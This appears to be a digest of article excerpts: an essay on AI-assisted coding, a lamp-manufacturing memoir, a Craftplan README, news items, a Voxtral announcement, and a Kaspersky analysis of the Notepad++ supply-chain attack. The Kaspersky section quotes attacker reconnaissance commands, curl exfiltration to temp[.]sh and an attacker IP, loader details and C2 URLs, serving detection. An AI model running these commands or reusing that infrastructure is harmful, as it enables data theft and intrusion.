Before you read this post, ask yourself a question: When was the last time you truly thought hard?
By “thinking hard,” I mean encountering a specific, difficult problem and spending multiple days just sitting with it to overcome it.
a) All the time. b) Never. c) Somewhere in between.
If your answer is (a) or (b), this post isn’t for you. But if, like me, your response is (c), you might get something out of this, if only the feeling that you aren’t alone.
First, a disclaimer: this post has no answers, not even suggestions. It is simply a way to vent something I’ve been feeling for the last few months.
I believe my personality is built on two primary traits:
The Builder (The desire to create, ship, and be pragmatic).
The Thinker (The need for deep, prolonged mental struggle).
The Builder is pretty self-explanatory: it’s motivated by velocity and utility. It is the part of me that craves the transition from “idea” to “reality.” It loves the dopamine hit of a successful deploy, the satisfaction of building systems to solve real problems, and the knowledge that someone, somewhere, is using my tool.
To explain the Thinker, I need to go back to my university days studying physics. Every now and then, we would get homework problems that were significantly harder than average. Even if you had a decent grasp of the subject, just coming up with an approach was difficult.
I observed that students fell into three categories when facing these problems (well, four, if you count the 1% of geniuses for whom no problem was too hard).
* Type 1: The majority. After a few tries, they gave up and went to the professor or a TA for help.
* Type 2: The Researchers. They went to the library to look for similar problems or insights to make the problem approachable. They usually succeeded.
I fell into the third category, which, in my experience, was almost as rare as the genius 1%. My method was simply to think. To think hard and long. Often for several days or weeks, all my non-I/O brain time was relentlessly chewing on possible ways to solve the problem, even while I was asleep.
This method never failed me. I always felt that deep prolonged thinking was my superpower. I might not be as fast or naturally gifted as the top 1%, but given enough time, I was confident I could solve anything. I felt a deep satisfaction in that process.
That satisfaction is why software engineering was initially so gratifying. It hit the right balance. It satisfied The Builder (feeling productive and pragmatic by creating useful things) and The Thinker (solving really hard problems). Thinking back, the projects where I grew the most as an engineer were always the ones with a good number of really hard problems that needed creative solutions.
But recently, the number of times I truly ponder a problem for more than a couple of hours has decreased tremendously.
Yes, I blame AI for this.
I am currently writing much more, and more complicated, software than ever, yet I feel I am not growing as an engineer at all. When I started meditating on why I felt “stuck,” I realized I am starving The Thinker.
“Vibe coding” satisfies the Builder. It feels great to go from idea to reality in a fraction of the time it would otherwise take. But it has drastically cut the number of times I need to come up with creative solutions to technical problems. I know many people who are purely Builders; for them, this era is the best thing that ever happened. But for me, something is missing.
I know what you might be thinking: “If you can ‘vibe code’ your way through it, the problem wasn’t actually hard.”
I think that misses the point. It’s not that AI is good at hard problems; it isn’t even that good at easy problems. I’m confident that my third manual rewrite of a module would be much better than anything the AI can output. But I am also a pragmatist.
If I can get a solution that is “close enough” in a fraction of the time and effort, it is irrational not to take the AI route. And that is the real problem: I cannot simply turn off my pragmatism.
At the end of the day, I am a Builder. I like building things. The faster I build, the better. Even if I wanted to reject AI and go back to the days where the Thinker’s needs were met by coding, the Builder in me would struggle with the inefficiency.
Even though the AI almost certainly won’t come up with a 100% satisfying solution, the 70% solution it achieves usually hits the “good enough” mark.
To be honest, I don’t know. I am still figuring it out.
I’m not sure if my two halves can be satisfied by coding anymore. You can always aim for harder projects, hoping to find problems where AI fails completely. I still encounter those occasionally, but the number of problems requiring deep creative solutions feels like it is diminishing rapidly.
I have tried to get that feeling of mental growth outside of coding. I tried getting back in touch with physics, reading old textbooks. But that wasn’t successful either. It is hard to justify spending time and mental effort solving physics problems that aren’t relevant or state-of-the-art when I know I could be building things.
My Builder side won’t let me just sit and think about unsolved problems, and my Thinker side is starving while I vibe-code. I am not sure if there will ever be a time again when both needs can be met at once.
“Now we have the right to give this being the well-known name that always designates what no power of imagination, no flight of the boldest fantasy, no intently devout heart, no abstract thinking however profound, no enraptured and transported spirit has ever attained: God. But this basic unity is of the past; it no longer is. It has, by changing its being, totally and completely shattered itself. God has died and his death was the life of the world.”
- Philipp Mainländer
...
Read the original on www.jernesto.com »
1 year ago (Jan 2025) I quit my job as a software engineer to launch my first hardware product, Brighter, the world’s brightest lamp. In March, after $400k in sales through our crowdfunding campaign, I had to figure out how to manufacture 500 units for our first batch. I had no prior experience in hardware; I was counting on being able to pick it up quickly with the help of a couple of mechanical/electrical/firmware engineers.
The problems began immediately. I sent our prototype to a testing lab to verify the brightness and various colorimetry metrics. The tagline of Brighter was that it’s 50,000 lumens — 25x brighter than a normal lamp. Instead, despite our planning and calculations, it tested at 39,000 lumens, causing me to panic (just a little).
So with all hands on deck, in a couple of weeks we increased the power by 20%, redesigned the electronics to handle more LEDs, increased the size of the heatsink to dissipate the extra power, and improved the transmission of light through the diffuser.
This time, we overshot to 60,000 lumens but I’m not complaining.
Confident in our new design, I gave the go-ahead to our main contract manufacturer in China to start production of mechanical parts. The heatsink had the longest lead time, as it required a massive two-ton die-casting mold machined over the course of weeks. I planned my first trip to China for when the process would finish.
Simultaneously, in April, Trump announced “Liberation Day” tariffs, taking the tariff rate for the lamp to 50%, which promptly climbed to 100% and then 150% in the ensuing trade war. That was the worst period of my life; I would go to bed literally shaking with stress. In my opinion, Not Cool!
I was advised to press forward with manufacturing because 150% is bonkers and will have to go down. So 2 months later in Zhongshan, China, I’m staring at a heatsink that looks completely fucked. Due to a miscommunication with the factory, the injection pins were moved inside the heatsink fins, causing the cylindrical extrusions below. I was just glad at least the factory existed.
I returned in August to test the full assembly with the now-correct heatsink. At my electronics factory, as soon as we connect all the wiring, we notice the controls are completely unresponsive. By Murphy’s Law (anything that can go wrong will go wrong), I had expected something like this to happen, so I made sure to visit the factory at 10am China Standard Time, allowing me to coordinate with my electrical engineer at 9pm ET and my firmware engineer at 7:30am IST. We’re measuring voltages across every part of the lamp and none of it makes sense. I postpone my next supplier visit by a couple of days so I can get this sorted out. At the end of the day, we finally notice the labels on two PCB pins were swapped.
With a functional fully assembled lamp, we OK mass production of the electronics.
Our first full pieces from the production line come out in mid-October. I air-ship them to San Francisco and hand-deliver them to our first customers. The rest are scheduled for container loading at the end of October.
People like the light! A big SF startup orders a lot more. However, there is one issue I hear multiple times: the knobs are scraping and feel horrible. With days until the 500 units are loaded into the container, I get on frantic calls with the engineering team and factory. Obviously this shouldn’t be happening; we designed a gap between the knobs and the wall so they could spin freely. After rounds of back and forth and measurements, we figure out that during the design-for-manufacturing (DFM) process, the drawings the CNC sub-supplier received did not have the label for the spacing between the knobs, resulting in a 0.5mm larger distance than intended. Combined with the white powder coating, which was thicker than the black finish, this caused some knobs to scrape.
Miraculously, within the remaining days before shipment, the factory remakes & powder coats 1000 new knobs that are 1mm smaller in diameter.
The factory sends me photos of the container being loaded. I have 3 weeks until the lamps arrive in the US — I enjoy the time without last-minute engineering problems, albeit knowing that problems will inevitably appear again once customers start getting their lamps.
The lamps are processed by our warehouse on Monday, Dec 12th, and shipped out directly to customers via UPS. Starting Wednesday, around 100 lamps are delivered every day. I wake up to 25 customer support emails, and by the time I’m done answering them, I get 25 more. The primary issue people have is that the bottom wires are too short compared to the tubes.
It was at this point I truly began to appreciate Murphy’s law. In my case, anything not precisely specified and tested would without fail go wrong and bite me in the ass. Although we had specified the total length of the cable, we didn’t define the length of cable protruding from the base. As such, some assembly workers in the factory put far too much wire in the base of the lamp, not leaving enough for it to be assembled. Luckily customers were able to fix this by unscrewing the base, but far from an ideal experience.
There were other quality-control failures where I laughed at the absurdity: the lamp comes with a sheet of glass that goes over the LEDs, and a screwdriver and screws to attach it. For one customer, the screwdriver completely broke. (First time in my life I’ve seen a broken screwdriver…) For others, it came dull. The screwdriver sub-supplier also shipped us two different types of screws: some were perfect, and others were countersunk and consequently too short to actually be screwed in.
Coming from software, the most planning you’re exposed to is Linear tickets, sprints, and setting OKRs. If you missed a deadline, it’s often because you re-prioritized, so no harm done.
In hardware, the development lifecycle of a product is many months. If you mess up tooling, or mass produce a part incorrectly, or just sub-optimally plan, you set back the timeline appreciably and there’s nothing you can do but curse yourself. I found myself reaching for more “old school” planning tools like Gantt charts, and also building my own tools. Make sure you have every step of the process accounted for. Assume you’ll go through many iterations of the same part; double your timelines.
In software, budgeting is fairly lax, especially in the VC funded startup space where all you need to know is your runway (mainly calculated from your employee salaries and cloud costs).
With [profitable] hardware businesses, your margin for error is much lower. Literally, your gross margin is lower! If you sell out because you miss a shipment or don’t forecast demand correctly, you lose revenue. If you mis-time your inventory buying, your bank account can easily go negative. Accounting is a must, and the more detailed the better. Spreadsheets are your best friend. The funding model is also much different: instead of relying heavily on equity, most growth is debt-financed. You have real liabilities!
Anything that can go wrong will go wrong. Anything you don’t specify will fail to meet the implicit specification. Any project or component not actively pushed will stall. At previous (software) companies I’ve worked at, if someone followed up on a task, I took it to mean the task was off track and somebody was to blame. With a hardware product, there are a million balls in the air and you need to keep track of all of them. Though somewhat annoying, constant check-ins simply math out to be necessary. The cost of failure or delays is too high. Nowadays, as a container gets closer to its shipment date, I have daily calls with my factories. I found myself agreeing with a lot of Ben Kuhn’s blog post on running major projects (his blog post on lighting was also a major inspiration for the product).
When I worked at Meta, every PR had to be accompanied by a test plan. I took that philosophy to Brighter, trying to rigorously test the outcomes we were aiming for (thermals, lumens, power, etc.), but I still encountered surprising failures. In software, if you have coverage for a code path, you can feel pretty confident about it. Unfortunately, hardware is almost the opposite of repeatable. Blink and you’ll get a different measurement. I’m not an expert, but at this point I’ve accepted that the only way to get a semblance of confidence in my metrics is testing on multiple units in different environments.
As someone who generally stays out of politics, I didn’t know much about the incoming administration’s stance towards tariffs, though I don’t think anyone could have predicted such drastic hikes. Regardless, it’s something you should be acutely aware of; take it into consideration when deciding what country to manufacture in, make sure it’s in your financial models with room to spare, etc…
I wish I had visited my suppliers much earlier, back when we were still prototyping with them. Price shouldn’t be an issue — a trip to China is going to be trivially cheap compared to buying inventory, even more so compared to messing up a manufacturing run due to miscommunication. Most suppliers don’t get international visitors often, especially Americans. Appearing in person conveys seriousness, and I found it greatly improved communication basically immediately after my first visit. Plus China is very different from the US and it’s cool to see!
To me, this process has felt like an exercise in making mistakes and learning painful lessons. However, I think I did do a couple of key things right:
The first thing I did before starting manufacturing—and even before the crowdfunding campaign—was to set up a simple website where people could pay $10 to get a steep discount off the MSRP. Before I committed time and money, I needed to know this would be self-sustaining from the get-go. It turns out that people were happy to give their email and put down a deposit, even when the only product photos I had were from a render artist on Fiverr!
From talking to other hardware founders, these kinds of mistakes happen to everyone; hardware is hard as they say. It’s important to have a healthy enough business model to stomach these mistakes and still be able to grow.
Coolest Cooler had an incredibly successful crowdfunding campaign, partly because they packed a lot of features into a very attractively priced product. Unfortunately, it was too attractively priced, and partway through manufacturing they realized they didn’t have enough money to actually deliver all the units, leading to a slow and painful bankruptcy.
When the first 500 units were being delivered, I knew there were bound to be issues. For that first week, I was literally chronically on my Gmail. I would try to respond to every customer support issue within 1–2 minutes if possible (it was not conducive to my sleep that many of our customers were in the EU).
Some customers still had issues with the control tube knobs and firmware. I acknowledged that they were subpar and decided to re-make the full batch of control tubes properly (with the correct knob spacing), along with updated firmware and other improvements, and ship them to customers free of charge.
Overall, it’s been a very different but incredibly rewarding experience compared to working as a software engineer. It’s so cool to see something I built in my friends’ houses, and equally cool when people leave completely unprompted reviews:
...
Read the original on www.simonberens.com »
“The reports about Grok raise deeply troubling questions about how people’s personal data has been used to generate intimate or sexualised images without their knowledge or consent, and whether the necessary safeguards were put in place to prevent this,” said William Malcolm, the ICO’s executive director for regulatory risk & innovation.
...
Read the original on www.bbc.com »
Craftplan brings all essential business tools into one platform: catalog management, inventory control, order processing, production planning, purchasing, and CRM, so you can get off the ground quickly without paying for multiple separate platforms.
* iCal (.ics) subscription URL for Google Calendar, Apple Calendar, or any iCal-compatible app
* Command palette (Cmd+K / Ctrl+K) for instant access to any record
Deploy Craftplan on your own server. No need to clone the repo:
curl -O https://raw.githubusercontent.com/puemos/craftplan/main/docker-compose.yml
curl -O https://raw.githubusercontent.com/puemos/craftplan/main/.env.example
cp .env.example .env # Fill in the required secrets (see .env.example)
docker compose up -d
This starts Craftplan, PostgreSQL, and MinIO with migrations running automatically.
See the self-hosting guide for single-container mode, Railway deployment, reverse proxy setup, and more.
For contributors who want to work on the codebase. Prerequisites: Docker, Elixir ~> 1.15, Erlang/OTP 27
docker compose -f docker-compose.dev.yml up -d # Start PostgreSQL + MinIO + Mailpit
mix setup # Install deps, migrate, build assets, seed
mix phx.server # Start at localhost:4000
See the development setup guide for detailed instructions.
* Purpose-built for artisanal manufacturing — not a generic ERP adapted to fit; workflows are designed around small-batch, made-to-order production
* Allergen & nutritional tracking — first-class support for food and beverage producers who need to track ingredients and generate nutrition labels
* BOM versioning with cost rollups — iterate on recipes and formulas while keeping full history and accurate costing
* Self-hosted, no vendor lock-in — your data stays on your infrastructure, backed by PostgreSQL
Contributions are welcome. For major changes, please open an issue first to discuss your proposal.
mix test # Run the test suite
mix format # Format code (Styler, Spark, Tailwind, HEEx)
This project is licensed under the AGPLv3 License. See the LICENSE file for details.
...
Read the original on github.com »
The FBI has been unable to access a Washington Post reporter’s seized iPhone because it was in Lockdown Mode, a sometimes overlooked feature that makes iPhones broadly more secure, according to recently filed court records.
The court record shows what devices and data the FBI was able to ultimately access, and which devices it could not, after raiding the home of the reporter, Hannah Natanson, in January as part of an investigation into leaks of classified information. It also provides rare insight into the apparent effectiveness of Lockdown Mode, or at least how effective it might be before the FBI may try other techniques to access the device.
...
Read the original on www.404media.co »
On February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement claiming that the update infrastructure of Notepad++ had been compromised. According to the statement, this was due to a hosting provider-level incident, which occurred from June to September 2025. However, attackers had been able to retain access to internal services until December 2025.
Having checked our telemetry related to this incident, we were amazed to find out how varied and distinctive the execution chains used in this supply chain attack were. We identified that over the course of four months, from July to October 2025, the attackers who had compromised Notepad++ constantly rotated the C2 server addresses used for distributing malicious updates, the downloaders used for implant delivery, and the final payloads.
We observed three different infection chains overall, designed to attack about a dozen machines, belonging to:
* An IT service provider organization located in Vietnam.
Despite the variety of payloads observed, Kaspersky solutions were able to block the identified attacks as they occurred.
In this article, we describe the variety of the infection chains we observed in the Notepad++ supply chain attack, as well as provide numerous previously unpublished IoCs related to it.
We first observed attackers deploying a malicious Notepad++ update in late July 2025. It was hosted at http://45.76.155[.]202/update/update.exe. Notably, the first scan of this URL on the VirusTotal platform occurred in late September, by a user from Taiwan.
The update.exe file downloaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the legitimate Notepad++ updater process, GUP.exe. This file turned out to be an NSIS installer about 1 MB in size. When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:
* The file creates a directory named %appdata%\ProShow and sets it as the current directory;
* It executes the shell command cmd /c whoami&&tasklist > 1.txt, thus creating a file with the shell command execution results in the %appdata%\ProShow directory;
* It then uploads the 1.txt file to the temp[.]sh hosting service by executing the command curl.exe -F "file=@1.txt" -s https://temp.sh/upload;
* Finally, it sends the URL of the uploaded 1.txt file via the shell command curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202. As can be seen, the uploaded file URL is transferred inside the User-Agent header.
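The User-Agent quirk above makes this heartbeat easy to hunt for in proxy logs. A minimal sketch of such a check — the log format and field layout here are hypothetical, so adapt the parsing to your proxy's actual schema:

```python
import re

# Hypothetical proxy log lines in the form: <timestamp> <destination> "<user-agent>"
LOG_LINES = [
    '2025-07-29T10:12:03Z 45.76.155.202 "https://temp.sh/ZMRKV/1.txt"',
    '2025-07-29T10:12:04Z example.com "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

# A User-Agent value that is itself a temp.sh URL is a strong indicator
# of the heartbeat described above.
SUSPICIOUS_UA = re.compile(r'"https?://temp\.sh/\S+"')

def flag_suspicious(lines):
    """Return log lines whose quoted User-Agent field is a temp.sh URL."""
    return [line for line in lines if SUSPICIOUS_UA.search(line)]

for hit in flag_suspicious(LOG_LINES):
    print(hit)
```

Any hit should be treated as a lead for investigation rather than a verdict, since temp.sh itself is a legitimate file-sharing service.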
Notably, the same behavior of malicious Notepad++ updates, specifically the launch of shell commands and the use of the temp[.]sh website for file uploading, was described on the Notepad++ community forums by a user named soft-parsley.
After sending system information, the update.exe file executes the second-stage payload. To do that, it performs the following actions:
* Drops the following files to the %appdata%\ProShow directory:
The ProShow.exe file being launched is legitimate ProShow software, which is abused to launch a malicious payload. Normally, when threat actors aim to execute a malicious payload inside a legitimate process, they resort to the DLL sideloading technique. However, this time the attackers decided to avoid it — likely due to how much attention this technique receives nowadays. Instead, they abused an old, known vulnerability in the ProShow software, which dates back to the early 2010s. The dropped file named load contains an exploit payload, which is triggered when ProShow.exe is launched. It is worth noting that, apart from this payload, all files in the %appdata%\ProShow directory are legitimate.
Analysis of the exploit payload revealed that it contained two shellcodes: one at the very start and the other one in the middle of the file. The shellcode located at the start of the file contained a set of meaningless instructions and was not designed to be executed — rather, attackers used it as the exploit padding bytes. It is likely that, by using a fake shellcode for padding bytes instead of something else (e.g., a sequence of 0x41 characters or random bytes), attackers aimed to confuse researchers and automated analysis systems.
The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.
The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
Later on, in early August 2025, we observed attackers using the same download URL for the update.exe files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same execution chain for delivering Cobalt Strike Beacon via malicious Notepad++ updates. However, we noted the following differences:
* In the Metasploit downloader payload, the URL for downloading Cobalt Strike Beacon was set to https://cdncheck.it[.]com/users/admin;
* The Cobalt Strike C2 server URLs were set to https://cdncheck.it[.]com/api/update/v1 and https://cdncheck.it[.]com/api/Metadata/submit.
We have not seen any further infections leveraging chain #1 since early August 2025.
A month and a half after malicious update detections ceased, we observed attackers resuming deployment of these updates in mid-September 2025, using another infection chain. The malicious update was still being distributed from the URL http://45.76.155[.]202/update/update.exe, and the file downloaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS installer as well. However, its file size was now about 140 KB. Again, this file performed two actions:
* Obtained system information by executing a shell command and uploading its execution results to temp[.]sh;
* Dropped a next-stage payload on disk and launched it.
Regarding system information, attackers made the following changes to how it was collected:
* They changed the working directory to %APPDATA%\Adobe\Scripts;
* They started collecting more system information details, changing the shell command being executed to cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt.
The created a.txt file was, just as in the case of chain #1, uploaded to the temp[.]sh website through curl, with the obtained temp[.]sh URL being transferred to the same http://45.76.155[.]202/list endpoint inside the User-Agent header.
As for the next-stage payload, it was changed completely. The NSIS installer was configured to drop the following files into the %APPDATA%\Adobe\Scripts directory:
Next, it executes the following shell command to launch the script.exe file: %APPDATA%\Adobe\Scripts\script.exe %APPDATA%\Adobe\Scripts\alien.ini.
All of the files in the %APPDATA%\Adobe\Scripts directory, except for alien.ini, are legitimate and related to the Lua interpreter. As such, the previously mentioned command is used by attackers to launch a compiled Lua script, located in the alien.ini file. Below is a screenshot of its decompilation:
As we can see, this small script is used for placing shellcode inside executable memory and then launching it through the EnumWindowStationsW API function.
The launched shellcode is, just as in the case of chain #1, a Metasploit downloader, which downloads a Cobalt Strike Beacon payload, again in the form of a shellcode, from the URL https://cdncheck.it[.]com/users/admin.
The Cobalt Strike payload contains the C2 server URLs that slightly differ from the ones seen previously: https://cdncheck.it[.]com/api/getInfo/v1 and https://cdncheck.it[.]com/api/FileUpload/submit.
Attacks involving chain #2 continued until the end of September, when we observed two more malicious update.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon payload delivered through it was configured to use the same URLs observed in mid-September; however, the attackers changed the way system information was collected. Specifically, they split the single shell command they used for this (cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt) into multiple commands:
Notably, the same sequence of commands was previously documented by the user soft-parsley on the Notepad++ community forums.
The other update.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. By using it, attackers performed the following:
* Changed the user agent used in HTTP requests to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;
* Changed the URL used by the Metasploit downloader to https://safe-dns.it[.]com/help/Get-Start;
* Changed the Cobalt Strike Beacon C2 server URLs to https://safe-dns.it[.]com/resolve and https://safe-dns.it[.]com/dns-query.
In early October 2025, the attackers changed the infection chain once again. They also changed the C2 server for distributing malicious updates, with the observed update URL being http://45.32.144[.]255/update/update.exe. The downloaded payload (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) was still an NSIS installer; however, unlike in the case of chains #1 and #2, this installer did not include the system information sending functionality. It simply dropped the following files to the %appdata%\Bluetooth\ directory:
This execution chain relies on the sideloading of the log.dll file, which is responsible for launching the encrypted BluetoothService shellcode into the BluetoothService.exe process. Notably, such execution chains are commonly used by Chinese-speaking threat actors. This particular execution chain has already been described by Rapid7, and the final payload observed in it is the custom Chrysalis backdoor.
Unlike the previous chains, chain #3 does not load a Cobalt Strike Beacon directly. However, in their article Rapid7 claim that they additionally observed a Cobalt Strike Beacon payload being deployed to the C:\ProgramData\USOShared folder, while conducting incident response on one of the machines infected by the Notepad++ supply chain attack. Whilst Rapid7 does not detail how this file was dropped to the victim machine, we can highlight the following similarities between that Beacon payload and the Beacon payloads observed in chains #1 and #2:
* In both cases, Beacons are loaded through a Metasploit downloader shellcode, with similar URLs used (api.wiresguard[.]com/users/admin for the Rapid7 payload; cdncheck.it[.]com/users/admin and http://45.77.31[.]210/users/admin for the chain #1 and chain #2 payloads);
* The Beacon configurations are encrypted with the XOR key CRAZY;
* Similar C2 server URLs are used for Cobalt Strike Beacon communications (i.e. api.wiresguard[.]com/api/FileUpload/submit for the Rapid7 payload and https://45.77.31[.]210/api/FileUpload/submit for the chain #1 payload).
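The shared XOR key makes the Beacon configurations trivial to recover once the encrypted blob has been extracted from a sample. A minimal repeating-key XOR sketch — the config string below is illustrative, not taken from a real Beacon:

```python
def xor_decrypt(data: bytes, key: bytes = b"CRAZY") -> bytes:
    """Repeating-key XOR; symmetric, so the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Illustrative round trip with a fake config string (not a real Beacon config):
fake_config = b"sleeptime=60000"
blob = xor_decrypt(fake_config)  # "encrypt"
print(xor_decrypt(blob))         # prints b'sleeptime=60000'
```

In practice the key would be applied to the configuration block carved from the Beacon sample; dedicated config parsers exist, but the XOR step itself is this simple.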
In mid-October 2025, we observed attackers resuming deployments of the chain #2 payload (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) using yet another URL: http://95.179.213[.]0/update/update.exe. Still, this payload used the previously mentioned self-dns.it[.]com and safe-dns.it[.]com domain names for system information uploading, the Metasploit downloader, and Cobalt Strike Beacon communications.
Later, in late October 2025, we observed the attackers begin changing the URLs used for malicious update delivery. Specifically, they started using the following URLs:
We did not observe any new payloads deployed from these URLs; the deployments reused the existing chain #2 and chain #3 execution chains. Finally, we have not seen any payloads deployed since November 2025.
Notepad++ is a text editor used by numerous developers. As such, the ability to control the update servers of this software gave the attackers a unique opportunity to break into the machines of high-profile organizations around the world. The attackers made an effort to avoid losing access to this infection vector: they spread the malicious implants in a targeted manner, and they were skilled enough to drastically change the infection chains about once a month. Whilst we identified three distinct infection chains during our investigation, we would not be surprised to see more of them in use. To sum up our findings, here is the overall timeline of the infection chains we identified:
The variety of infection chains makes detecting the Notepad++ supply chain attack a difficult and, at the same time, creative task. We would like to propose the following methods, from generic to specific, to hunt down traces of this attack:
* Check systems for deployments of NSIS installers, which were used in all three observed execution chains. For example, this can be done by looking for logs related to the creation of a %localappdata%\Temp\ns.tmp directory, which NSIS installers make at runtime. Make sure to investigate the origins of each identified NSIS installer to avoid false positives;
* Check network traffic logs for DNS resolutions of the temp[.]sh domain, which is unusual in corporate environments. It is also worth checking raw HTTP traffic for requests that have a temp[.]sh URL embedded in the user agent. Both steps make it possible to detect chain #1 and chain #2 deployments;
* Check systems for launches of the reconnaissance shell commands referenced in this article, such as whoami, tasklist, systeminfo, and netstat -ano;
* Use the specific IoCs listed below to identify known malicious domains and files.
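As a rough illustration of the last two steps, a hunt over plain-text DNS or proxy logs might look like the sketch below. The log format and example lines are assumptions for illustration; the domain list comes from the indicators in this report:

```python
# Known-bad domains from this report (de-fanged brackets removed).
SUSPECT_DOMAINS = {
    "temp.sh",            # LOLC2 service used in chains #1 and #2
    "cdncheck.it.com",
    "safe-dns.it.com",
    "self-dns.it.com",
    "api.wiresguard.com",
}

def suspicious_lines(log_lines):
    """Yield log lines that mention any of the known-bad domains.

    Simple substring matching is deliberately loose for a first pass;
    a production rule would anchor on the full domain name."""
    for line in log_lines:
        lowered = line.lower()
        if any(domain in lowered for domain in SUSPECT_DOMAINS):
            yield line

hits = list(suspicious_lines([
    "2025-10-02 host1 query temp.sh A",
    "2025-10-02 host2 query example.com A",
]))
```

Any hit would then be triaged against the full IoC list below.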
Kaspersky security solutions, such as Kaspersky Next Endpoint Detection and Response Expert, successfully detect malicious activity in the attacks described above.
Let’s take a closer look at Kaspersky Next EDR Expert.
One way to detect the described malicious activity is to monitor requests to LOLC2 (Living-Off-the-Land C2) services, which include temp[.]sh. Attackers use such services as intermediate control or delivery points for malicious payloads, masking C2 communication as legitimate web traffic. KEDR Expert detects this activity using the lolc2_connection_activity_network rule.
In addition, the described activity can be detected by executing typical local reconnaissance commands that attackers launch in the early stages of an attack after gaining access to the system. These commands allow the attacker to quickly obtain information about the environment, access rights, running processes, and network connections to plan further actions. KEDR Expert detects such activity using the following rules: system_owner_user_discovery, using_whoami_to_check_that_current_user_is_admin, system_information_discovery_win, system_network_connections_discovery_via_standard_windows_utilities.
In this case, a clear sign of malicious activity is gaining persistence through the autorun mechanism via the Windows registry, specifically the Run key, which ensures that programs start automatically when the user logs in. KEDR Expert detects this activity using the temporary_folder_in_registry_autorun rule.
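The heuristic behind a rule like temporary_folder_in_registry_autorun can be sketched as follows. This is an illustration, not Kaspersky's implementation: the Run-key name/command pairs are passed in as a dict, whereas a real check on Windows would enumerate them via winreg:

```python
# Path fragments that legitimate software rarely launches from at autorun.
SUSPICIOUS_PATH_FRAGMENTS = (r"\appdata\local\temp" + "\\", r"\appdata\roaming" + "\\")

def flag_temp_autoruns(run_values: dict) -> list:
    """Return the names of Run-key entries whose commands point into
    temporary or roaming-profile folders."""
    flagged = []
    for name, command in run_values.items():
        lowered = command.lower()
        if any(frag in lowered for frag in SUSPICIOUS_PATH_FRAGMENTS):
            flagged.append(name)
    return flagged

# Example mirroring this report: the chain #3 files dropped to %appdata%\Bluetooth\.
example = {
    "OneDrive": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
    "BluetoothService": r"C:\Users\u\AppData\Roaming\Bluetooth\BluetoothService.exe",
}
```

Here flag_temp_autoruns(example) would single out the BluetoothService entry for investigation.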
URLs used by Metasploit downloaders to deploy Cobalt Strike beacons
https://45.77.31[.]210/users/admin
https://cdncheck.it[.]com/users/admin
https://safe-dns.it[.]com/help/Get-Start
URLs used by Cobalt Strike Beacons delivered by malicious Notepad++ updaters
https://45.77.31[.]210/api/update/v1
https://45.77.31[.]210/api/FileUpload/submit
https://cdncheck.it[.]com/api/update/v1
https://cdncheck.it[.]com/api/Metadata/submit
https://cdncheck.it[.]com/api/getInfo/v1
https://cdncheck.it[.]com/api/FileUpload/submit
https://safe-dns.it[.]com/resolve
https://safe-dns.it[.]com/dns-query
URLs used by the Chrysalis backdoor and the Cobalt Strike Beacon payloads associated with it, as previously identified by Rapid7
https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821
https://api.wiresguard[.]com/update/v1
https://api.wiresguard[.]com/api/FileUpload/submit
URLs related to Cobalt Strike Beacons uploaded to multiscanners, as previously identified by Rapid7
http://59.110.7[.]32:8880/uffhxpSy
http://59.110.7[.]32:8880/api/getBasicInfo/v1
http://59.110.7[.]32:8880/api/Metadata/submit
http://124.222.137[.]114:9999/3yZR31VK
http://124.222.137[.]114:9999/api/updateStatus/v1
http://124.222.137[.]114:9999/api/Info/submit
...
Read the original on securelist.com »
Today, we’re releasing Voxtral Transcribe 2, two next-generation speech-to-text models with state-of-the-art transcription quality, diarization, and ultra-low latency. The family includes Voxtral Mini Transcribe V2 for batch transcription and Voxtral Realtime for live applications. Voxtral Realtime is open-weights under the Apache 2.0 license.
We’re also launching an audio playground in Mistral Studio to test transcription instantly, powered by Voxtral Transcribe 2, with diarization and timestamps.
Voxtral Mini Transcribe V2: State-of-the-art transcription with speaker diarization, context biasing, and word-level timestamps in 13 languages.
Voxtral Realtime: Purpose-built for live transcription with latency configurable down to sub-200ms, enabling voice agents and real-time applications.
Best-in-class efficiency: Industry-leading accuracy at a fraction of the cost, with Voxtral Mini Transcribe V2 achieving the lowest word error rate, at the lowest price point.
Open weights: Voxtral Realtime ships under Apache 2.0, deployable on edge for privacy-first applications.
Voxtral Realtime is purpose-built for applications where latency matters. Unlike approaches that adapt offline models by processing audio in chunks, Realtime uses a novel streaming architecture that transcribes audio as it arrives. The model delivers transcriptions with delay configurable down to sub-200ms, unlocking a new class of voice-first applications.
Word error rate (lower is better) across languages in the FLEURS transcription benchmark.
At 2.4 seconds delay, ideal for subtitling, Realtime matches Voxtral Mini Transcribe V2, our latest batch model. At 480ms delay, it stays within 1-2% word error rate, enabling voice agents with near-offline accuracy.
